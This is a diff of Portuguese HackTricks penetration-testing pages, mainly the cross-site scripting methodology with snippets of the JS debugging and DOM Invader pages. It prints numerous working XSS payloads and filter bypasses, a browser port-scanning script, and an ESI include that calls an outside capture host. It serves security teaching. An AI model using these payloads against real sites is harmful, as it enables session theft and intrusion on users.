3. Se você **não pode escapar do atributo** (`"` é codificado ou excluído), então dependendo de **qual atributo** seu valor está sendo refletido e **se você controla todo o valor ou apenas uma parte** você poderá abusá-lo. Por **exemplo**, se você controla um evento como `onclick=` você poderá fazê-lo executar código arbitrário quando clicado. Outro **exemplo** interessante é o atributo `href`, onde você pode usar o protocolo `javascript:` para executar código arbitrário: **`href="javascript:alert(1)"`**
4. Se sua entrada é refletida dentro de tags "**não exploráveis**", você poderia tentar o truque do **`accesskey`** para abusar da vulnerabilidade (você precisará de algum tipo de engenharia social para explorar isso): **`" accesskey="x" onclick="alert(1)" x="`**
### Dentro do código JavaScript
Neste caso, sua entrada é refletida entre as tags **`<script> [...] </script>`** de uma página HTML, dentro de um arquivo `.js` ou dentro de um atributo usando o protocolo **`javascript:`**:
* Se refletido entre as tags **`<script> [...] </script>`**, mesmo que sua entrada esteja dentro de qualquer tipo de aspas, você pode tentar injetar `</script>` e escapar deste contexto. Isso funciona porque o **navegador primeiro analisa as tags HTML** e depois o conteúdo, portanto, não perceberá que sua tag `</script>` injetada está dentro do código HTML.
* Se refletido **dentro de uma string JS** e o último truque não está funcionando, você precisará **sair** da string, **executar** seu código e **reconstruir** o código JS (se houver algum erro, ele não será executado):
* Se refletido **dentro de uma string JS** e o último truque não está funcionando, você precisará **sair** da string, **executar** seu código e **reconstruir** o código JS (se houver algum erro, ele não será executado:
* `'-alert(1)-'`
* `';-alert(1)//`
* `\';alert(1)//`
@ -83,7 +83,7 @@ Neste caso, sua entrada é refletida entre as tags **`<script> [...] </script>`*
```
#### Elevação de Javascript
Elevação de Javascript refere-se à oportunidade de **declarar funções, variáveis ou classes depois de serem usadas, para que você possa abusar de cenários onde um XSS está usando variáveis ou funções não declaradas.**\
Elevação de Javascript refere-se à oportunidade de **declarar funções, variáveis ou classes depois de serem usadas, para que você possa abusar de cenários onde um XSS está utilizando variáveis ou funções não declaradas.**\
**Confira a seguinte página para mais informações:**
{% content-ref url="js-hoisting.md" %}
@ -100,7 +100,7 @@ Uma boa maneira de descobrir se algo fornecido diretamente pelo usuário está t
Caso esteja vulnerável, você poderia ser capaz de **disparar um alerta** apenas enviando o valor: **`?callback=alert(1)`**. No entanto, é muito comum que esses endpoints **validem o conteúdo** para permitir apenas letras, números, pontos e sublinhados (**`[\w\._]`**).
No entanto, mesmo com essa limitação, ainda é possível realizar algumas ações. Isso ocorre porque você pode usar esses caracteres válidos para **acessar qualquer elemento no DOM**:
No entanto, mesmo com essa limitação, ainda é possível realizar algumas ações. Isso porque você pode usar esses caracteres válidos para **acessar qualquer elemento no DOM**:
![](<../../.gitbook/assets/image (662).png>)
@ -149,7 +149,7 @@ Alguns **exemplos**:
## Injetando dentro do HTML bruto
Quando sua entrada é refletida **dentro da página HTML** ou você pode escapar e injetar código HTML neste contexto, a **primeira** coisa que você precisa fazer é verificar se você pode abusar de `<` para criar novas tags: Apenas tente **refletir** esse **caractere** e verifique se ele está sendo **codificado em HTML** ou **deletado** ou se é **refletido sem alterações**. **Apenas no último caso você será capaz de explorar este caso**.\
Quando sua entrada é refletida **dentro da página HTML** ou você pode escapar e injetar código HTML neste contexto, a **primeira** coisa que você precisa fazer é verificar se pode abusar de `<` para criar novas tags: Apenas tente **refletir** esse **caractere** e verifique se ele está sendo **codificado em HTML** ou **deletado** ou se é **refletido sem alterações**. **Apenas no último caso você poderá explorar este caso**.\
Para esses casos também **lembre-se** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Nota: Um comentário HTML pode ser fechado usando**** ****`-->`**** ****ou**** ****`--!>`**_
@ -159,12 +159,12 @@ Neste caso e se nenhum sistema de lista negra/branca estiver sendo usado, você
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>
```
Mas, se estiver sendo usada uma lista de permissões/bloqueios de tags/atributos, você precisará **forçar a descoberta de quais tags** pode criar.\
Mas, se estiver sendo usada uma lista de permissões/negações de tags/atributos, você precisará **forçar a descoberta de quais tags** pode criar.\
Uma vez que você tenha **localizado quais tags são permitidas**, será necessário **forçar a descoberta de atributos/eventos** dentro das tags válidas encontradas para ver como você pode atacar o contexto.
### Força bruta em Tags/Eventos
Vá para [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) e clique em _**Copiar tags para a área de transferência**_. Em seguida, envie todas elas usando o Burp Intruder e verifique se alguma tag não foi descoberta como maliciosa pelo WAF. Uma vez que você tenha descoberto quais tags pode usar, você pode **forçar a descoberta de todos os eventos** usando as tags válidas (na mesma página da web clique em _**Copiar eventos para a área de transferência**_ e siga o mesmo procedimento anterior).
Acesse [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) e clique em _**Copiar tags para a área de transferência**_. Em seguida, envie todas elas usando o Burp Intruder e verifique se alguma tag não foi descoberta como maliciosa pelo WAF. Uma vez que você tenha descoberto quais tags pode usar, você pode **forçar a descoberta de todos os eventos** usando as tags válidas (na mesma página da web, clique em _**Copiar eventos para a área de transferência**_ e siga o mesmo procedimento anterior).
### Tags personalizadas
@ -269,7 +269,7 @@ Se você **não pode escapar da tag**, você poderia criar novos atributos dentr
```
### Dentro do atributo
Mesmo que você **não possa escapar do atributo** (`"` está sendo codificado ou excluído), dependendo de **qual atributo** seu valor está sendo refletido **se você controla todo o valor ou apenas uma parte** você será capaz de abusar dele. Por **exemplo**, se você controla um evento como `onclick=` você poderá fazer com que ele execute código arbitrário quando for clicado.\
Mesmo que você **não possa escapar do atributo** (`"` está sendo codificado ou excluído), dependendo de **qual atributo** seu valor está sendo refletido **se você controla todo o valor ou apenas uma parte** você será capaz de abusar dele. Por **exemplo**, se você controla um evento como `onclick=` você poderá fazê-lo executar código arbitrário quando for clicado.\
Outro **exemplo** interessante é o atributo `href`, onde você pode usar o protocolo `javascript:` para executar código arbitrário: **`href="javascript:alert(1)"`**
**Bypass dentro do evento usando codificação HTML/codificação de URL**
@ -305,7 +305,7 @@ Note que **qualquer tipo de codificação HTML é válido**:
```
### Protocolos Especiais Dentro do Atributo
Lá você pode usar os protocolos **`javascript:`** ou **`data:`** em alguns lugares para **executar código JS arbitrário**. Alguns exigirão interação do usuário e outros não.
Você pode usar os protocolos **`javascript:`** ou **`data:`** em alguns lugares para **executar código JS arbitrário**. Alguns exigirão interação do usuário e outros não.
```javascript
javascript:alert(1)
JavaSCript:alert(1)
@ -353,7 +353,7 @@ _**Neste caso, a codificação HTML e o truque de codificação Unicode da seç
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
Além disso, há outro **truque interessante** para esses casos: **Mesmo que sua entrada dentro de `javascript:...` esteja sendo codificada para URL, ela será decodificada antes de ser executada.** Então, se você precisar **escapar** de uma **string** usando uma **aspas simples** e perceber que **ela está sendo codificada para URL**, lembre-se de que **não importa,** ela será **interpretada** como uma **aspas simples** durante o **tempo de execução.**
Além disso, há outro **truque interessante** para esses casos: **Mesmo que sua entrada dentro de `javascript:...` esteja sendo codificada para URL, ela será decodificada antes de ser executada.** Então, se você precisar **escapar** da **string** usando uma **aspas simples** e perceber que **está sendo codificada para URL**, lembre-se de que **não importa,** ela será **interpretada** como uma **aspas simples** durante o **tempo de execução.**
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
@ -387,7 +387,7 @@ Se você puder injetar qualquer URL em uma tag **`<a href=`** arbitrária que co
### Bypass de Manipuladores de Eventos "on"
Primeiramente, verifique esta página ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) para encontrar manipuladores de eventos **"on"** úteis.\
Primeiro, verifique esta página ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) para encontrar manipuladores de eventos **"on"** úteis.\
Caso haja alguma lista negra impedindo você de criar esses manipuladores de eventos, você pode tentar os seguintes bypasses:
```javascript
<svg onload%09=alert(1)> //No safari
@ -403,9 +403,9 @@ Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
### XSS em "Tags não exploráveis" (input oculto, link, canonical, meta)
### XSS em "Tags inexploráveis" (input oculto, link, canonical, meta)
A partir [**deste ponto**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **é agora possível abusar de inputs ocultos com:**
De [**aqui**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **é agora possível abusar de inputs ocultos com:**
```html
<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle=alert(1)>
@ -418,7 +418,7 @@ E em **meta tags**:
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
De [**aqui**](https://portswigger.net/research/xss-in-hidden-input-fields): Você pode executar um **payload XSS dentro de um atributo oculto**, desde que você consiga **persuadir** a **vítima** a pressionar a **combinação de teclas**. No Firefox para Windows/Linux, a combinação é **ALT+SHIFT+X** e no OS X é **CTRL+ALT+X**. Você pode especificar uma combinação de teclas diferente usando uma tecla diferente no atributo de tecla de acesso. Aqui está o vetor:
De [**aqui**](https://portswigger.net/research/xss-in-hidden-input-fields): Você pode executar um **payload XSS dentro de um atributo oculto**, desde que você consiga **persuadir** a **vítima** a pressionar a **combinação de teclas**. No Firefox Windows/Linux a combinação de teclas é **ALT+SHIFT+X** e no OS X é **CTRL+ALT+X**. Você pode especificar uma combinação de teclas diferente usando uma chave diferente no atributo de chave de acesso. Aqui está o vetor:
```markup
<input type="hidden" accesskey="X" onclick="alert(1)">
```
@ -426,7 +426,7 @@ De [**aqui**](https://portswigger.net/research/xss-in-hidden-input-fields): Voc
### Bypasses de Lista Negra
Vários truques usando diferentes codificações já foram expostos nesta seção. Volte **para aprender onde você pode usar:**
Vários truques usando diferentes codificações já foram expostos nesta seção. Volte para **aprender onde você pode usar:**
* **Codificação HTML (tags HTML)**
* **Codificação Unicode (pode ser código JS válido):** `\u0061lert(1)`
@ -466,15 +466,17 @@ Este truque foi retirado de [https://medium.com/@skavans\_/improving-the-impact-
Nestes casos, sua **entrada** será **refletida dentro do código JS** de um arquivo `.js` ou entre tags `<script>...</script>` ou entre eventos HTML que podem executar código JS ou entre atributos que aceitam o protocolo `javascript:`.
### Escapando tag \<script>
### Escapando da tag \<script>
Se o seu código for inserido dentro de `<script> [...] var input = 'dados refletidos' [...] </script>`, você poderia facilmente **escapar fechando a tag `<script>`**:
```javascript
</script><img src=1 onerror=alert(document.domain)>
```
Note que neste exemplo **não fechamos sequer a aspa simples**, mas isso não é necessário, pois o **navegador primeiro realiza a análise HTML** para identificar os elementos da página, incluindo blocos de script, e só depois realiza a análise JavaScript para entender e executar os scripts incorporados.
### Dentro do código JS
Se `<>` estiverem sendo sanitizados, você ainda pode **escapar da string** onde sua entrada está sendo **localizada** e **executar JS arbitrário**. É importante **corrigir a sintaxe JS**, porque se houver algum erro, o código JS não será executado:
Se `<>` estiverem sendo sanitizados, você ainda pode **escapar da string** onde sua entrada está sendo **localizada** e **executar JS arbitrário**. É importante **corrigir a sintaxe JS**, porque se houver erros, o código JS não será executado:
```
'-alert(document.domain)-'
';alert(document.domain)//
@ -727,21 +729,21 @@ top[8680439..toString(30)](1)
````
## **Vulnerabilidades DOM**
**código JS** que está usando **dados controlados de forma insegura por um atacante** como `location.href`. Um atacante poderia abusar disso para executar código JS arbitrário.\
Existe **código JS** que está utilizando **dados controlados de forma insegura por um atacante** como `location.href`. Um atacante poderia abusar disso para executar código JS arbitrário.\
**Devido à extensão da explicação sobre** [**vulnerabilidades DOM, ela foi movida para esta página**](dom-xss.md)**:**
{% content-ref url="dom-xss.md" %}
[dom-xss.md](dom-xss.md)
{% endcontent-ref %}
Lá você encontrará uma explicação detalhada **sobre o que são vulnerabilidades DOM, como são provocadas e como explorá-las**.\
Lá você encontrará uma **explicação detalhada sobre o que são vulnerabilidades DOM, como são provocadas e como explorá-las**.\
Além disso, não esqueça que **no final do post mencionado** você pode encontrar uma explicação sobre [**ataques de DOM Clobbering**](dom-xss.md#dom-clobbering).
## Outros Bypasses
### Unicode Normalizado
Você poderia verificar se os **valores refletidos** estão sendo **normalizados para unicode** no servidor (ou no lado do cliente) e abusar dessa funcionalidade para burlar proteções. [**Encontre um exemplo aqui**](../unicode-injection/#xss-cross-site-scripting).
Você pode verificar se os **valores refletidos** estão sendo **normalizados para unicode** no servidor (ou no lado do cliente) e abusar dessa funcionalidade para burlar proteções. [**Encontre um exemplo aqui**](../unicode-injection/#xss-cross-site-scripting).
### Bypass da flag FILTER\_VALIDATE\_EMAIL do PHP
```javascript
@ -750,7 +752,7 @@ Você poderia verificar se os **valores refletidos** estão sendo **normalizados
### Bypass no Ruby-On-Rails
Devido ao **RoR mass assignment**, aspas são inseridas no HTML e então a restrição de aspas é contornada e campos adicionais (onfocus) podem ser adicionados dentro da tag.\
Por exemplo, no formulário ([deste relatório](https://hackerone.com/reports/709336)), se você enviar o payload:
Exemplo de formulário ([deste relatório](https://hackerone.com/reports/709336)), se você enviar o payload:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
@ -803,7 +805,7 @@ Protocolos conhecidos no passado: `mailto://`, `//x:1/`, `ws://`, `wss://`, _cab
### Apenas Letras, Números e Pontos
Se você conseguir indicar o **callback** que o JavaScript vai **executar** limitado a esses caracteres. [**Leia esta seção deste post**](./#javascript-function) para descobrir como abusar desse comportamento.
Se você conseguir indicar o **callback** que o javascript vai **executar** limitado a esses caracteres. [**Leia esta seção deste post**](./#javascript-function) para encontrar como abusar deste comportamento.
### Tipos de Conteúdo `<script>` Válidos para XSS
@ -1164,7 +1166,7 @@ console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms")
};
}
```
_Tempos curtos indicam uma porta que está respondendo_ _Tempos mais longos indicam que não houve resposta._
_Tempos curtos indicam uma porta que está respondendo_ _Tempos mais longos indicam que não há resposta._
Revise a lista de portas banidas no Chrome [**aqui**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc) e no Firefox [**aqui**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
@ -1292,7 +1294,7 @@ console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
```
### Lista de Força Bruta
### Lista de Brute-Force
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
@ -1308,7 +1310,7 @@ console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightCo
### XSS para SSRF
Conseguiu um XSS em um **site que usa cache**? Tente **converter isso em SSRF** através da injeção de Edge Side Include com este payload:
Conseguiu um XSS em um **site que usa cache**? Tente **transformá-lo em SSRF** através da injeção de Edge Side Include com este payload:
```python
<esi:include src="http://yoursite.com/capture" />
```
@ -1318,7 +1320,7 @@ Mais informações sobre esta técnica aqui: [**XSLT**](../xslt-server-side-inje
### XSS em PDF criado dinamicamente
Se uma página web está criando um PDF usando entrada controlada pelo usuário, você pode tentar **enganar o bot** que está criando o PDF para **executar código JS arbitrário**.
Então, se o **bot criador de PDF encontrar** algum tipo de **tags HTML**, ele vai **interpretá-las**, e você pode **abusar** desse comportamento para causar um **XSS no Servidor**.
Então, se o **bot criador de PDF encontrar** algum tipo de **tags HTML**, ele vai **interpretá-las**, e você pode **abusar** desse comportamento para causar um **Server XSS**.
{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
@ -1332,7 +1334,7 @@ Se você não conseguir injetar tags HTML, pode valer a pena tentar **injetar da
### XSS em Amp4Email
AMP é uma tecnologia conhecida por desenvolver páginas web super rápidas em clientes móveis. **AMP é um conjunto de tags HTML suportadas por JavaScript** que facilmente habilita funcionalidades com um foco adicional em desempenho e segurança. Existem [componentes AMP](https://amp.dev/documentation/components/?format=websites) para tudo, desde carrosséis, elementos de formulário responsivos, até a recuperação de conteúdo atualizado de endpoints remotos.
AMP é uma tecnologia conhecida por desenvolver páginas web super rápidas em clientes móveis. **AMP é um conjunto de tags HTML suportadas por JavaScript** que facilmente habilita funcionalidades com um foco adicional em desempenho e segurança. Existem [componentes AMP](https://amp.dev/documentation/components/?format=websites) para tudo, desde carrosséis, a elementos de formulário responsivos, até a obtenção de conteúdo atualizado de endpoints remotos.
O formato [**AMP para Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) fornece [um subconjunto de componentes AMP](https://github.com/ampproject/amphtml/blob/master/docs/spec/email/amp-email-components.md) que você pode usar em mensagens de e-mail. Destinatários de e-mails AMP podem visualizar e interagir com os componentes AMP diretamente no e-mail.
@ -1404,7 +1406,7 @@ Encontre **mais payloads SVG em** [**https://github.com/allanlw/svg-cheatsheet**
[other-js-tricks.md](other-js-tricks.md)
{% endcontent-ref %}
## Recursos de XSS
## Recursos XSS
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
* [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list)
@ -1412,7 +1414,7 @@ Encontre **mais payloads SVG em** [**https://github.com/allanlw/svg-cheatsheet**
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
### FERRAMENTAS DE XSS
### FERRAMENTAS XSS
Encontre algumas [**ferramentas para XSS aqui**](xss-tools.md)**.**
@ -1423,12 +1425,14 @@ Encontre algumas [**ferramentas para XSS aqui**](xss-tools.md)**.**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

48
pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
View file

@ -1,37 +1,39 @@
# Depuração de JS do lado do cliente
# Depuração de JS do Lado do Cliente
## Depuração de JS do lado do cliente
## Depuração de JS do Lado do Cliente
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Depurar o JS do lado do cliente pode ser uma dor de cabeça porque toda vez que você altera a URL (incluindo uma alteração nos parâmetros usados ou nos valores dos parâmetros), você precisa **redefinir o ponto de interrupção e recarregar a página**.
Depurar JS do lado do cliente pode ser complicado porque toda vez que você muda a URL (incluindo uma mudança nos parâmetros usados ou nos valores dos parâmetros) você precisa **redefinir o ponto de interrupção e recarregar a página**.
### `debugger;`
Se você colocar a linha `debugger;` dentro de um arquivo JS, quando o **navegador** executar o JS, ele i **parar** o **depurador** naquele lugar. Portanto, uma maneira de definir pontos de interrupção constantes seria **baixar todos os arquivos localmente e definir pontos de interrupção no código JS**.
Se você colocar a linha `debugger;` dentro de um arquivo JS, quando o **navegador** executar o JS, ele vai **parar** o **depurador** naquele ponto. Portanto, uma maneira de definir pontos de interrupção constantes seria **baixar todos os arquivos localmente e definir pontos de interrupção no código JS**.
### Substituições
### Overrides
As substituições do navegador permitem ter uma cópia local do código que será executado e executar essa cópia em vez da do servidor remoto.\
Você pode **acessar as substituições** em "Dev Tools" --> "Sources" --> "Overrides".
Overrides do navegador permitem ter uma cópia local do código que será executado e executar essa cópia em vez da do servidor remoto.\
Você pode **acessar os overrides** em "Ferramentas do Desenvolvedor" --> "Sources" --> "Overrides".
Você precisa **criar uma pasta local vazia para ser usada para armazenar as substituições**, então basta criar uma nova pasta local e defini-la como substituição nessa página.
Você precisa **criar uma pasta local vazia para ser usada para armazenar os overrides**, então apenas crie uma nova pasta local e defina-a como override nessa página.
Em seguida, em "Dev Tools" --> "Sources" **selecione o arquivo** que você deseja substituir e com **clique com o botão direito do mouse em "Salvar para substituições"**.
Depois, em "Ferramentas do Desenvolvedor" --> "Sources" **selecione o arquivo** que você quer sobrescrever e com o **clique direito selecione "Salvar para overrides"**.
![](<../../.gitbook/assets/image (649).png>)
Isso i **copiar o arquivo JS localmente** e você poderá **modificar essa cópia no navegador**. Basta adicionar o comando **`debugger;`** onde quiser, **salvar** a alteração e **recarregar** a página, e toda vez que você acessar essa página da web, **sua cópia JS local será carregada** e seu comando de depuração mantido em seu lugar:
Isso vai **copiar o arquivo JS localmente** e você poderá **modificar essa cópia no navegador**. Então, basta adicionar o comando **`debugger;`** onde você quiser, **salvar** a alteração e **recarregar** a página, e toda vez que você acessar essa página web **sua cópia local de JS será carregada** e seu comando de depuração mantido no lugar:
![](<../../.gitbook/assets/image (648).png>)
@ -41,12 +43,14 @@ Isso irá **copiar o arquivo JS localmente** e você poderá **modificar essa c
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

96
pentesting-web/xss-cross-site-scripting/dom-invader.md
View file

@ -2,90 +2,92 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
